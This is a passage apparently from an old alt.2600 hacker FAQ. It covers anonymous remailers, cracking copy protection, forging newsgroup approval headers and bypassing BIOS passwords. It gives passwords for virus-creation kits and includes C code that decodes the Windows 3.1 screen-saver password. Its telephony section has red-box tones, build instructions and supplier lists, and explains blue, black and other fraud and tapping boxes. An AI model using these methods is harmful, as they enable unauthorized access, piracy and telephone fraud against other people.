  2650. The user of the anon.penet.fi system first needs to get an anonymous id.
  2651. This is done either by sending mail to somebody who already has one (for
  2652. example, by replying to a post on Usenet), or sending mail to
  2653. ping@anon.penet.fi.  In either case, penet will mail back the new anon
  2654. id, which looks like an123456@anon.penet.fi.  If an123456 then sends
  2655. mail to another user of the system, then this is what happens:
  2656.  
  2657. 1.  The mail is transported to anon.penet.fi, which resides somewhere in
  2658.     the vicinity of Espoo, Finland.
  2659.  
  2660. 2.  These steps are carried out by software running on anon.penet.fi.
  2661.     Penet first looks up the email address of the sender in its
  2662.     database, then replaces it with the numeric code.  All other
  2663.     information about the sender is removed.
  2664.  
  2665. 3.  Then, penet looks up the number of the recipient in the same
  2666.     database, and replaces it with the actual email address.
  2667.  
  2668. 4.  Finally, it sends the mail to the actual email address of the
  2669.     recipient.
  2670.  
  2671. There are variations on this scheme, such as posting to Usenet (in which
  2672. step 3 is eliminated), but that's the basic idea.
  2673.  
  2674. Where anon.penet.fi uses a secret database to match anon id's to actual
  2675. email addresses, the cypherpunks remailers use cryptography to hide the
  2676. actual identities.  Let's say I want to send email to a real email
  2677. address, or post it to Usenet, but keep my identity completely hidden.
  2678. To send it through one remailer, this is what happens.
  2679.  
  2680. 1.  I encrypt the message and the recipient's address, using the public
  2681.     key of the remailer of my choice.
  2682.  
  2683. 2.  I send the email to the remailer.
  2684.  
  2685. 3.  When the remailer gets the mail, it decrypts it using its private
  2686.     key, revealing as plaintext the message and the recipient's address.
  2687.  
  2688. 4.  All information about the sender is removed.
  2689.  
  2690. 5.  Finally, it sends it to the recipient's email address.
  2691.  
  2692. If one trusts the remailer operator, this is good enough.  However, the
  2693. whole point of the cypherpunks remailers is that you don't _have_ to
  2694. trust any one individual or system.  So, people who want real security
  2695. use a chain of remailers.  If any one remailer on the "chain" is honest,
  2696. then the privacy of the message is assured.
  2697.  
  2698. To use a chain of remailers, I first have to prepare the message, which
  2699. is nestled within multiple layers of encryption, like a Russian
  2700. matryoshka doll.  Preparing such a message is tedious and error prone,
  2701. so many people use an automated tool such as my premail package.
  2702. Anyway, after preparing the message, it is sent to the first remailer in
  2703. the chain, which corresponds to the outermost layer of encryption.  Each
  2704. remailer strips off one layer of encryption and sends the message to the
  2705. next, until it reaches the final remailer.  At this point, only the
  2706. innermost layer of encryption remains.  This layer is stripped off,
  2707. revealing the plaintext message and recipient for the first time.  At
  2708. this point, the message is sent to its actual recipient.
  2709.  
  2710. Remailers exist in many locations.  A typical message might go through
  2711. Canada, Holland, Berkeley, and Finland before ending up at its final
  2712. location.
  2713.  
  2714. Aside from the difficulty of preparing all the encrypted messages,
  2715. another drawback of the cypherpunk remailers is that they don't easily
  2716. allow responses to anonymous mail.  All information about the sender is
  2717. stripped away, including any kind of return address.  However the new
  2718. alias servers promise to change that.  To use an alias server, one
  2719. creates a new email address (mine is raph@alpha.c2.org).  Mail sent to
  2720. this new address will be untraceably forwarded to one's real address.
  2721.  
  2722. To set this up, one first encrypts one's own email address with multiple
  2723. layers of encryption.  Then, using an encrypted channel, one sends the
  2724. encrypted address to the alias server, along with the nickname that one
  2725. would like.  The alias server registers the encrypted address in the
  2726. database.  The alias server then handles reply mail in much the same way
  2727. as anon.penet.fi, except that the mail is forwarded to the chain of
  2728. anonymous remailers.
  2729.  
  2730. For maximum security, the user can arrange it so that, at each link in
  2731. the chain, the remailer adds another layer of encryption to the message
  2732. while removing one layer from the email address.  When the user finally
  2733. gets the email, it is encrypted in multiple layers.  The matryoshka has
  2734. to be opened one doll at a time until the plaintext message hidden
  2735. inside is revealed.
  2736.  
  2737. One other point is that the remailers must be reliable in order for all
  2738. this to work.  This is especially true when a chain of remailers is used
  2739. -- if any one of the remailers is not working, then the message will be
  2740. dropped.  This is why I maintain a list of reliable remailers. By
  2741. choosing reliable remailers to start with, there is a good chance the
  2742. message will finally get there.
  2743.  
  2744.  
  2745. 32. What are the addresses of some anonymous remailers?
  2746.  
  2747. The most popular and stable anonymous remailer is anon.penet.fi,
  2748. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  2749. ping@anon.penet.fi.
  2750.  
  2751. The server at anon.penet.fi does it's best to remove any headers or
  2752. other information describing its true origin.  You should make an effort
  2753. and try to omit information detailing your identity within such messages
  2754. as quite often signatures not starting with "--" are including within
  2755. your e-mail, this of course is not what you want.  You can send messages
  2756. to:
  2757.  
  2758.         anXXX@anon.penet.fi
  2759.  
  2760. Here you are addressing another anonymous user and your E-Mail message
  2761. will appear to have originated from anon.penet.fi.
  2762.  
  2763.         alt.security@anon.penet.fi
  2764.  
  2765. Here you are posting an anonymous message to a whole Usenet group and in
  2766. this case to alt.security which will be posted at the local site (in
  2767. this case Finland).
  2768.  
  2769.         ping@anon.penet.fi
  2770.  
  2771. If you send a message to this address you will be allocated an identity
  2772. (assuming you don't already have one).  You can also confirm your
  2773. identity here as well.
  2774.  
  2775. You can also set yourself a password, this password helps to
  2776. authenticate any messages that you may send.  This password is included
  2777. in your outgoing messages, to set a password send E-Mail to
  2778. password@anon.penet.fi with your password in the body of your text e.g.:
  2779.  
  2780.         To: password@anon.penet.fi
  2781.         Subject:
  2782.         TN0_rUlEz
  2783.  
  2784. For more information on this anonymous server send mail to:
  2785.  
  2786.         help@anon.penet.fi
  2787.  
  2788. Anonymous Usenet posting is frowned upon by other users of Usenet groups
  2789. claiming their opinions are worthless.  This is because they believe
  2790. anonymity is used to shield ones self from attacks from opponents, while
  2791. on the other hand it can be used to protect ones self from social
  2792. prejudice (or people reporting ones opinions to ones superiors).  Also
  2793. if you are thinking this is a useful tool to use to hid against the
  2794. authorities then think again, as there was a famous case where a Judge
  2795. ordered the administrator of the server to reveal the identity of a
  2796. poster.
  2797.  
  2798. To see a comprehensive list on anonymous remailers finger
  2799. remailer-list@kiwi.cs.berkeley.edu or point your web browser to
  2800. http://www.cs.berkeley.edu/~raph/remailer-list.html.
  2801.  
  2802.  
  2803. 33. How do I defeat Copy Protection?
  2804.  
  2805. There are two common methods of defeating copy protection.  The first
  2806. is to use a program that removes copy protection.  Popular programs
  2807. that do this are CopyIIPC from Central Point Software and CopyWrite
  2808. from Quaid Software.  The second method involves patching the copy
  2809. protected program.  For popular software, you may be able to locate a
  2810. ready made patch.  You can them apply the patch using any hex editor,
  2811. such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
  2812. patch the software yourself.
  2813.  
  2814. Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
  2815. also requires some knowledge of assembly language.  Load the protected
  2816. program under the debugger and watch for it to check the protection
  2817. mechanism.  When it does, change that portion of the code.  The code
  2818. can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
  2819. JMP (Jump Unconditionally).  Or the code may simply be replaced with
  2820. NOP (No Operation) instructions.
  2821.  
  2822.  
  2823. 34. What is 127.0.0.1?
  2824.  
  2825. 127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...
  2826. to it you are connected to your own machine.
  2827.  
  2828.  
  2829. 35. How do I post to a moderated newsgroup?
  2830.  
  2831. Usenet messages consist of message headers and message bodies.  The
  2832. message header tells the news software how to process the message.
  2833. Headers can be divided into two types, required and optional. Required
  2834. headers are ones like "From" and "Newsgroups."  Without the required
  2835. headers, your message will not be posted properly.
  2836.  
  2837. One of the optional headers is the "Approved" header.  To post to a
  2838. moderated newsgroup, simply add an Approved header line to your
  2839. message header.  The header line should contain the newsgroup
  2840. moderators e-mail address.  To see the correct format for your target
  2841. newsgroup, save a message from the newsgroup and then look at it using
  2842. any text editor.
  2843.  
  2844. A "Approved" header line should look like this:
  2845.  
  2846. Approved: will@gnu.ai.mit.edu
  2847.  
  2848. There cannot not be a blank line in the message header.  A blank line
  2849. will cause any portion of the header after the blank line to be
  2850. interpreted as part of the message body.
  2851.  
  2852. For more information, read RFC 1036: Standard for Interchange of
  2853. USENET messages.
  2854.  
  2855.  
  2856. 36. How do I post to Usenet via e-mail?
  2857.  
  2858. Through an e-mail->Usenet gateway.  Send an a e-mail messages to
  2859. <newsgroup>@<servername>.  For example, to post to alt.2600 through
  2860. nic.funet.fi, address your mail to alt.2600@nic.funet.fi.
  2861.  
  2862. Here are a few e-mail->Usenet gateways:
  2863.  
  2864. .group.name@news.demon.co.uk
  2865. .group.name@charm.magnus.acs.ohio-state.edu
  2866. .group.name@undergrad.math.uwaterloo.ca
  2867. .group.name@nic.funet.fi
  2868. .group.name.usenet@decwrl.dec.com
  2869.  
  2870.  
  2871. 37. How do I defeat a BIOS password?
  2872.  
  2873. This depends on what BIOS the machine has.  Common BIOS's include AMI,
  2874. Award, IBM and Phoenix.  Numerous other BIOS's do exist, but these are
  2875. the most common.
  2876.  
  2877. Some BIOS's allow you to require a password be entered before the system
  2878. will boot. Some BIOS's allow you to require a password to be entered
  2879. before the BIOS setup may be accessed.
  2880.  
  2881. Every BIOS must store this password information somewhere.  If you are
  2882. able to access the machine after it has been booted successfully, you
  2883. may be able to view the password.  You must know the memory address
  2884. where the password is stored, and the format in which the password is
  2885. stored.  Or, you must have a program that knows these things.
  2886.  
  2887. The most common BIOS password attack programs are for Ami BIOS.  Some
  2888. password attack programs will return the AMI BIOS password in plain
  2889. text, some will return it in ASCII codes, some will return it in scan
  2890. codes. This appears to be dependent not just on the password attacker,
  2891. but also  on the version of Ami BIOS.
  2892.  
  2893. To obtain Ami BIOS password attackers, ftp to oak.oakland.edu
  2894. /simtel/msdos/sysutil/.
  2895.  
  2896. If you cannot access the machine after if has been powered up, it is
  2897. still possible to get past the password.  The password is stored in CMOS
  2898. memory that is maintained while the PC is powered off by a small
  2899. battery, which is attached to the motherboard.  If you remove this
  2900. battery, all CMOS information will be lost.  You will need to re-enter
  2901. the correct CMOS setup information to use the machine.  The machines
  2902. owner or user will most likely be alarmed when it is discovered that the
  2903. BIOS password has been deleted.
  2904.  
  2905. On some motherboards, the battery is soldered to the motherboard, making
  2906. it difficult to remove.  If this is the case, you have another
  2907. alternative.  Somewhere on the motherboard you should find a jumper that
  2908. will clear the BIOS password.  If you have the motherboard
  2909. documentation, you will know where that jumper is.  If not, the jumper
  2910. may be labeled on the motherboard.  If you are not fortunate enough for
  2911. either of these to be the case, you may be able to guess which jumper is
  2912. the correct jumper.  This jumper is usually standing alone near the
  2913. battery.
  2914.  
  2915.  
  2916. 38. What is the password for <encrypted file>?
  2917.  
  2918. This FAQ answer was written by crypt <crypt@nyongwa.montreal.qc.ca>
  2919.  
  2920.  Magazine                        Password
  2921.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~    ~~~~~~~~~~~
  2922.  VLAD Magazine Issue #1          vlad
  2923.  VLAD Magazine Issue #2          vx
  2924.  VLAD Magazine Issue #3          virus
  2925.  NuKE InfoJournal Issue #2       514738
  2926.  NuKE InfoJournal Issue #3       power
  2927.  NuKE InfoJournal Issue #4       party
  2928.  
  2929.  Program
  2930.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~    ~~~~~~~~~~~
  2931.  Sphere Hacker 1.40 & 1.41       theozone
  2932.  Virus Creation 2000             high level
  2933.  Virus Construction Lab          Chiba City
  2934.  Ejecutor Virus Creator          EJECUTOR
  2935.  Biological Warfare v0.90        lo tek
  2936.  Biological Warfare v1.00        freak
  2937.  
  2938.  
  2939. 39. Is there any hope of a decompiler that would convert an executable
  2940.     program into C/C++ code?
  2941.  
  2942. This FAQ answer is an excerpt from SNIPPETS by Bob Stout.
  2943.  
  2944. Don't hold your breath. Think about it... For a decompiler to work
  2945. properly, either 1) every compiler would have to generate substantially
  2946. identical code, even with full optimization turned on, or 2) it would
  2947. have to recognize the individual output of every compiler's code
  2948. generator.
  2949.  
  2950. If the first case were to be correct, there would be no more need for
  2951. compiler benchmarks since every one would work the same.  For the second
  2952. case to be true would require in immensely complex program that had to
  2953. change with every new compiler release.
  2954.  
  2955. OK, so what about specific decompilers for specific compilers - say a
  2956. decompiler designed to only work on code generated by, say, BC++ 4.5?
  2957. This gets us right back to the optimization issue.  Code written for
  2958. clarity and understandability is often inefficient.  Code written for
  2959. maximum performance (speed or size) is often cryptic (at best!) Add to
  2960. this the fact that all modern compilers have a multitude of optimization
  2961. switches to control which optimization techniques to enable and which to
  2962. avoid.  The bottom line is that, for a reasonably large, complex source
  2963. module, you can get the compiler to produce a number of different object
  2964. modules simply by changing your optimization switches, so your
  2965. decompiler will also have to be a deoptimizer which can automagically
  2966. recognize which optimization strategies were enabled at compile time.
  2967.  
  2968. OK, let's simplify further and specify that you only want to support one
  2969. specific compiler and you want to decompile to the most logical source
  2970. code without trying to interpret the optimization.  What then?  A good
  2971. optimizer can and will substantially rewrite the internals of your code,
  2972. so what you get out of your decompiler will be, not only cryptic, but in
  2973. many cases, riddled with goto statements and other no-no's of good
  2974. coding practice.  At this point, you have decompiled source, but what
  2975. good is it?
  2976.  
  2977. Also note carefully my reference to source modules.  One characteristic
  2978. of C is that it becomes largely unreadable unless broken into easily
  2979. maintainable source modules (.C files).  How will the decompiler deal
  2980. with that? It could either try to decompile the whole program into some
  2981. mammoth main() function, losing all modularity, or it could try to place
  2982. each called function into its own file.  The first way would generate
  2983. unusable chaos and the second would run into problems where the original
  2984. source hade files with multiple functions using static data and/or one
  2985. or more functions calling one or more static functions.  A decompiler
  2986. could make static data and/or functions global but only at the expense
  2987. or readability (which would already be unacceptable).
  2988.  
  2989. Finally, remember that commercial applications often code the most
  2990. difficult or time-critical functions in assembler which could prove
  2991. almost impossible to decompile into a C equivalent.
  2992.  
  2993. Like I said, don't hold your breath. As technology improves to where
  2994. decompilers may become more feasible, optimizers and languages (C++, for
  2995. example, would be a significantly tougher language to decompile than C)
  2996. also conspire to make them less likely.
  2997.  
  2998. For years Unix applications have been distributed in shrouded source
  2999. form (machine but not human readable -- all comments and whitespace
  3000. removed, variables names all in the form OOIIOIOI, etc.), which has been
  3001. a quite adequate means of protecting the author's rights.  It's very
  3002. unlikely that decompiler output would even be as readable as shrouded
  3003. source.
  3004.  
  3005.  
  3006. 40. How does the MS-Windows password encryption work?
  3007.  
  3008. This FAQ answer was written by Wayne Hoxsie <hoxsiew@crl.com>
  3009.  
  3010. The password option in MS Win 3.1 is easily defeated, but there are
  3011. those of us who really want to know how MS does this.  There are many
  3012. reasons why knowing the actual password can be useful.  Suppose a
  3013. sysamin used the same password in the windows screen saver as his root
  3014. account on a unix box.
  3015.  
  3016. Anyway, I will attempt to relay what I have learned about this algorithm.
  3017.  
  3018. I will describe the process starting after you've entered the password
  3019. and hit the [OK] button.
  3020.  
  3021. I will make the assumtion that everyone (at least those interested) know
  3022. what the XOR operation is.
  3023.  
  3024. First, the length of the password is saved.  We'll call this 'len'.  We
  3025. will be moving characters from the entered string into another string as
  3026. they are encrypted.  We'll call the originally entered password
  3027. 'plaintext' and the encrypted string(strings--there are two passes)
  3028. 'hash1' and 'hash2.'  The position in the plaintext is important during
  3029. the process so we'll refer to this as 'pos.'  After each step of the
  3030. hashing process, the character is checked against a set of characters
  3031. that windows considers 'special.'  These characters are '[ ] =' and any
  3032. character below ASCII 33 or above ASCII 126.  I'll refer to this
  3033. checking operation as 'is_ok.'  All indecies are zero-based (i.e. an 8
  3034. character password is considered chars 0 to 7).
  3035.  
  3036. Now, the first character of 'plaintext' is xor'd with 'len' then fed to
  3037. 'is_ok'.  if the character is not valid, it is replaced by the original
  3038. character of 'plaintext' before going to the next operation.  The next
  3039. operation is to xor with 'pos' (this is useless for the first operation
  3040. since 'len' is 0 and anything xor'd with zero is itself) then fed to
  3041. 'is_ok' and replaced with the original if not valid.  The final
  3042. operation (per character) is to xor it with the previous character of
  3043. 'plaintext'. Since there is no previous character, the fixed value, 42,
  3044. is used on the first character of 'plaintext'.  This is then fed to
  3045. 'is_ok' and if OK, it is stored into the first position of 'hash1'  This
  3046. process proceeds until all characters of plaintext are exhausted.
  3047.  
  3048. The second pass is very similar, only now, the starting point is the
  3049. last character in hash1 and the results are placed into hash2 from the
  3050. end to the beginning.  Also, instead of using the previous character in
  3051. the final xoring, the character following the current character is used.
  3052. Since there is no character following the last character in hash1, the
  3053. value, 42 is again used for the last character.
  3054.  
  3055. 'hash2' is the final string and this is what windows saves in the file
  3056. CONTROL.INI.
  3057.  
  3058. To 'decrypt' the password, the above procedure is just reversed.
  3059.  
  3060. Now, what you've all been waiting for.  Here is some C code that will do
  3061. the dirty work for you:
  3062.  
  3063. #include <stdlib.h>
  3064. #include <stdio.h>
  3065. #include <string.h>
  3066.  
  3067. int xor1(int i,int j)
  3068. {
  3069.   int x;
  3070.  
  3071.   x=i^j;
  3072.   return (x>126||x<33||x==91||x==93||x==61)?i:x;
  3073. }
  3074. void main()
  3075. {
  3076.   FILE *f;
  3077.   int i,l;
  3078.   char s[80],s1[80];
  3079.  
  3080.   printf("Please enter the path to your Windows directory\n");
  3081.   gets(s1);
  3082.   sprintf(s,"%s%scontrol.ini",s1,s1[strlen(s1)-1]=='\\'?"":"\\");
  3083.   if((f=fopen(s,"rt"))==NULL){
  3084.     printf("File Error : %s\n",sys_errlist[errno]);
  3085.     exit(0);
  3086.   }
  3087.   while(strnicmp(fgets(s1,70,f),"password",8)!=0&&!feof(f));
  3088.   fclose(f);
  3089.   strtok(s1,"=\n");
  3090.   strcpy(s,strtok(NULL,"\n"));
  3091.   i=strlen(s)-1;
  3092.   for(l=i;l>-1;l--)
  3093.     s1[l]=xor1(xor1(xor1(s[l],l==i?42:s[l+1]),l==i?0:l),i+1);
  3094.   for(l=0;l<i+1;l++)
  3095.     s[l]=xor1(xor1(xor1(s1[l],l?s1[l-1]:42),l?l:0),i+1);
  3096.   printf("The Password is: %s\n",s);
  3097. }
  3098.  
  3099.  
  3100.  
  3101.  
  3102.  
  3103. Section B: Telephony
  3104. ~~~~~~~~~~~~~~~~~~~~
  3105.  
  3106. 01. What is a Red Box?
  3107.  
  3108. When a coin is inserted into a payphone, the payphone emits a set of
  3109. tones to ACTS (Automated Coin Toll System).  Red boxes work by fooling
  3110. ACTS into believing you have actually put money into the phone.  The
  3111. red box simply plays the ACTS tones into the telephone microphone.
  3112. ACTS hears those tones, and allows you to place your call.  The actual
  3113. tones are:
  3114.  
  3115. Nickel Signal      1700+2200hz  0.060s on
  3116. Dime Signal        1700+2200hz  0.060s on, 0.060s off, twice repeating
  3117. Quarter Signal     1700+2200hz  33ms on, 33ms off, 5 times repeating
  3118.  
  3119.  
  3120. Canada uses a variant of ACTSD called N-ACTS.  N-ACTS uses different
  3121. tones than ACTS.  In Canada, the tones to use are:
  3122.  
  3123. Nickel Signal      2200hz       0.060s on
  3124. Dime Signal        2200hz       0.060s on, 0.060s off, twice repeating
  3125. Quarter Signal     2200hz       33ms on, 33ms off, 5 times repeating
  3126.  
  3127.  
  3128. 02. How do I build a Red Box?
  3129.  
  3130. Red boxes are commonly manufactured from modified Radio Shack tone
  3131. dialers, Hallmark greeting cards, or made from scratch from readily
  3132. available electronic components.
  3133.  
  3134. To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer, open
  3135. the dialer and replace the crystal with a new one. The purpose of the
  3136. new crystal is to cause the * button on your tone dialer to create a
  3137. 1700Mhz and 2200Mhz tone instead of the original 941Mhz and 1209Mhz
  3138. tones.  The exact value of the replacement crystal should be 6.466806 to
  3139. create a perfect 1700Mhz tone and 6.513698 to create a perfect 2200mhz
  3140. tone.  A crystal close to those values will create a tone that easily
  3141. falls within the loose tolerances of ACTS. The most popular choice is
  3142. the 6.5536Mhz crystal, because it is the easiest to procure.  The old
  3143. crystal is the large shiny metal component labeled "3.579545Mhz."  When
  3144. you are finished replacing the crystal, program the P1 button with five
  3145. *'s.  That will simulate a quarter tone each time you press P1.
  3146.  
  3147.  
  3148. 03. Where can I get a 6.5536Mhz crystal?
  3149.  
  3150. Your best bet is a local electronics store.  Radio Shack sells them, but
  3151. they are overpriced and the store must order them in.  This takes
  3152. approximately two weeks.  In addition, many Radio Shack employees do not
  3153. know that this can be done.
  3154.  
  3155. Or, you could order the crystal mail order.  This introduces Shipping
  3156. and Handling charges, which are usually much greater than the price of
  3157. the crystal.  It's best to get several people together to share the S&H
  3158. cost.  Or, buy five or six yourself and sell them later.  Some of the
  3159. places you can order crystals are:
  3160.  
  3161. Digi-Key
  3162. 701 Brooks Avenue South
  3163. P.O. Box 677
  3164. Thief River Falls, MN 56701-0677
  3165. (800)344-4539
  3166. Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
  3167. Part Number:X018-ND
  3168.  
  3169. JDR Microdevices:
  3170. 2233 Branham Lane
  3171. San Jose, CA 95124
  3172. (800)538-5000
  3173. Part Number: 6.5536MHZ
  3174.  
  3175. Tandy Express Order Marketing
  3176. 401 NE 38th Street
  3177. Fort Worth, TX 76106
  3178. (800)241-8742
  3179. Part Number: 10068625
  3180.  
  3181. Alltronics
  3182. 2300 Zanker Road
  3183. San Jose CA 95131
  3184. (408)943-9774 Voice
  3185. (408)943-9776 Fax
  3186. (408)943-0622 BBS
  3187. Part Number: 92A057
  3188.  
  3189. Mouser
  3190. (800)346-6873
  3191. Part Number: 332-1066
  3192.  
  3193. Blue Saguaro
  3194. P.O. Box 37061
  3195. Tucson, AZ 85740
  3196. Part Number: 1458b
  3197.  
  3198. Unicorn Electronics
  3199. 10000 Canoga Ave, Unit c-2
  3200. Chatsworth, CA 91311
  3201. Phone: 1-800-824-3432
  3202. Part Number: CR6.5
  3203.  
  3204.  
  3205. 04. Which payphones will a Red Box work on?
  3206.  
  3207. Red Boxes will work on telco owned payphones, but not on COCOT's
  3208. (Customer Owned Coin Operated Telephones).
  3209.  
  3210. Red boxes work by fooling ACTS (Automated Coin Toll System) into
  3211. believing you have put money into the pay phone.  ACTS is the
  3212. telephone company software responsible for saying "Please deposit XX
  3213. cents" and listening for the coins being deposited.
  3214.  
  3215. COCOT's do not use ACTS.  On a COCOT, the pay phone itself is
  3216. responsible for determining what coins have been inserted.
  3217.  
  3218.  
  3219. 05. How do I make local calls with a Red Box?
  3220.  
  3221. Payphones do not use ACTS for local calls.  To use your red box for
  3222. local calls, you have to fool ACTS into getting involved in the call.
  3223.  
  3224. One way to do this, in some areas, is by dialing 10288-xxx-xxxx.  This
  3225. makes your call a long distance call, and brings ACTS into the
  3226. picture.
  3227.  
  3228. In other areas, you can call Directory Assistance and ask for the
  3229. number of the person you are trying to reach.  The operator will give
  3230. you the number and then you will hear a message similar to "Your call
  3231. can be completed automatically for an additional 35 cents."  When this
  3232. happens, you can then use ACTS tones.
  3233.  
  3234.  
  3235. 06. What is a Blue Box?
  3236.  
  3237. Blue boxes use a 2600hz tone to size control of telephone switches
  3238. that use in-band signalling.  The caller may then access special
  3239. switch functions, with the usual purpose of making free long distance
  3240. phone calls, using the tones provided by the Blue Box.
  3241.  
  3242.  
  3243. 07. Do Blue Boxes still work?
  3244.  
  3245. This FAQ answer is excerpted from a message posted to Usenet by
  3246. Marauder of the Legion of Doom:
  3247.  
  3248.         Somewhere along the line I have seen reference to something
  3249.         similar to "Because of ESS Blue boxing is impossible".  This is
  3250.         incorrect.  When I lived in Connecticut I was able to blue box
  3251.         under Step by Step, #1AESS, and DMS-100.  The reason is simple,
  3252.         even though I was initiating my call to an 800 number from a
  3253.         different exchange (Class 5 office, aka Central Office) in each
  3254.         case, when the 800 call was routed to the toll network it would
  3255.         route through the New Haven #5 Crossbar toll Tandem office.  It
  3256.         just so happens that the trunks between the class 5 (CO's) and
  3257.         the class 4 (toll office, in this case New Haven #5 Xbar),
  3258.         utilized in-band (MF) signalling, so regardless of what I
  3259.         dialed, as long as it was an Inter-Lata call, my call would
  3260.         route through this particular set of trunks, and I could Blue
  3261.         box until I was blue in the face.  The originating Central
  3262.         Offices switch (SXS/ESS/Etc..) had little effect on my ability
  3263.         to box at all.  While the advent of ESS (and other electronic
  3264.         switches) has made the blue boxers task a bit more difficult,
  3265.         ESS is not the reason most of you are unable to blue box.  The
  3266.         main culprit is the "forward audio mute" feature of CCIS (out of
  3267.         band signalling).  Unfortunately for the boxer 99% of the Toll
  3268.         Completion centers communicate using CCIS links, This spells
  3269.         disaster for the blue boxer since most of you must dial out of
  3270.         your local area to find trunks that utilize MF signalling, you
  3271.         inevitably cross a portion of the network that is CCIS equipped,
  3272.         you find an exchange that you blow 2600hz at, you are rewarded
  3273.         with a nice "winkstart", and no matter what MF tones you send at
  3274.         it, you meet with a re-order.  This is because as soon as you
  3275.         seized the trunk (your application of 2600hz), your Originating
  3276.         Toll Office sees this as a loss of supervision at the
  3277.         destination, and Mutes any further audio from being passed to
  3278.         the destination (ie: your waiting trunk!).  You meet with a
  3279.         reorder because the waiting trunk never "hears" any of the MF
  3280.         tones you are sending, and it times out.  So for the clever
  3281.         amongst you, you must somehow get yourself to the 1000's of
  3282.         trunks out there that still utilize MF signalling but
  3283.         bypass/disable the CCIS audio mute problem.  (Hint: Take a close
  3284.         look at WATS extenders).
  3285.  
  3286.  
  3287. 08. What is a Black Box?
  3288.  
  3289. A Black Box is a resistor (and often capacitor in parallel) placed in
  3290. series across your phone line to cause the phone company equipment to be
  3291. unable to detect that you have answered your telephone.  People who call
  3292. you will then not be billed for the telephone call.  Black boxes do not
  3293. work under ESS.
  3294.  
  3295.  
  3296. 09. What do all the colored boxes do?
  3297.  
  3298. Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
  3299. .     Call Forwarding on old 4-wire phone systems
  3300. Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
  3301. Beige        Lineman's hand set
  3302. Black        Allows the calling party to not be billed for the call
  3303. .     placed
  3304. Blast        Phone microphone amplifier
  3305. Blotto       Supposedly shorts every phone out in the immediate area
  3306. Blue         Emulate a true operator by seizing a trunk with a 2600hz
  3307. .     tone
  3308. Brown        Create a party line from 2 phone lines
  3309. Bud          Tap into your neighbors phone line
  3310. Chartreuse   Use the electricity from your phone line
  3311. Cheese       Connect two phones to create a diverter
  3312. Chrome       Manipulate Traffic Signals by Remote Control
  3313. Clear        A telephone pickup coil and a small amp used to make free
  3314. .     calls on Fortress Phones
  3315. Color        Line activated telephone recorder
  3316. Copper       Cause crosstalk interference on an extender
  3317. Crimson      Hold button
  3318. Dark         Re-route outgoing or incoming calls to another phone
  3319. Dayglo       Connect to your neighbors phone line
  3320. Diverter     Re-route outgoing or incoming calls to another phone
  3321. DLOC         Create a party line from 2 phone lines
  3322. Gold         Dialout router
  3323. Green        Emulate the Coin Collect, Coin Return, and Ringback tones
  3324. Infinity     Remotely activated phone tap
  3325. Jack         Touch-Tone key pad
  3326. Light        In-use light
  3327. Lunch        AM transmitter
  3328. Magenta      Connect a remote phone line to another remote phone line
  3329. Mauve        Phone tap without cutting into a line
  3330. Neon         External microphone
  3331. Noise        Create line noise
  3332. Olive        External ringer
  3333. Party        Create a party line from 2 phone lines
  3334. Pearl        Tone generator
  3335. Pink         Create a party line from 2 phone lines
  3336. Purple       Telephone hold button
  3337. Rainbow      Kill a trace by putting 120v into the phone line (joke)
  3338. Razz         Tap into your neighbors phone
  3339. Red          Make free phone calls from pay phones by generating
  3340. .     quarter tones
  3341. Rock         Add music to your phone line
  3342. Scarlet      Cause a neighbors phone line to have poor reception
  3343. Silver       Create the DTMF tones for A, B, C and D
  3344. Static       Keep the voltage on a phone line high
  3345. Switch       Add hold, indicator lights, conferencing, etc..
  3346. Tan          Line activated telephone recorder
  3347. Tron         Reverse the phase of power to your house, causing your
  3348. .     electric meter to run slower
  3349. TV Cable     "See" sound waves on your TV
  3350. Urine        Create a capacitative disturbance between the ring and
  3351. .     tip wires in another's telephone headset
  3352. Violet       Keep a payphone from hanging up
  3353. White        Portable DTMF keypad
  3354. Yellow       Add an extension phone
  3355.  
  3356. Box schematics may be retrieved from these FTP sites:
  3357.  
  3358. ftp.netcom.com          /pub/br/bradleym
  3359. ftp.netcom.com          /pub/va/vandal
  3360. ftp.winternet.com       /users/nitehwk
  3361.  
  3362.  
  3363. 10. What is an ANAC number?
  3364.  
  3365. An ANAC (Automatic Number Announcement Circuit) number is a telephone
  3366. number that plays back the number of the telephone that called it.
  3367. ANAC numbers are convenient if you want to know the telephone number
  3368. of a pair of wires.
  3369.  
  3370.  
  3371. 11. What is the ANAC number for my area?
  3372.  
  3373. How to find your ANAC number:
  3374.  
  3375. Look up your NPA (Area Code) and try the number listed for it. If that
  3376. fails, try 1 plus the number listed for it.  If that fails, try the
  3377. common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
  3378. number for your area, please let us know.
  3379.  
  3380. Note that many times the ANAC number will vary for different switches
  3381. in the same city.  The geographic naming on the list is NOT intended
  3382. to be an accurate reference for coverage patterns, it is for
  3383. convenience only.
  3384.  
  3385. Many companies operate 800 number services which will read back to you
  3386. the number from which you are calling.  Many of these require navigating
  3387. a series of menus to get the phone number you are looking for.  Please
  3388. use local ANAC numbers if you can, as overuse or abuse can kill 800 ANAC
  3389. numbers.
  3390.  
  3391. N (800)425-6256   VRS Billing Systems/Integretel (800)4BLOCKME
  3392.   (800)568-3197   Info Access Telephone Company's Automated Blocking Line
  3393.   (800)692-6447   (800)MY-ANI-IS  (Now protected by a passcode!)
  3394. N (800)858-9857   AT&T True Rewards
  3395.  
  3396. A non-800 ANAC that works nationwide is 404-988-9664.  The one catch
  3397. with this number is that it must be dialed with the AT&T Carrier Access
  3398. Code 10732.  Use of this number does not appear to be billed.
  3399.  
  3400. Note: These geographic areas are for reference purposes only.  ANAC
  3401. numbers may vary from switch to switch within the same city.
  3402.  
  3403.   NPA  ANAC number      Approximate Geographic area
  3404.   ---  ---------------  ---------------------------------------------
  3405.   201  958              Hackensack/Jersey City/Newark/Paterson, NJ
  3406.   202  811              District of Columbia
  3407.   203  970              CT
  3408.   205  300-222-2222     Birmingham, AL
  3409.   205  300-555-5555     Many small towns in AL
  3410.   205  300-648-1111     Dora, AL
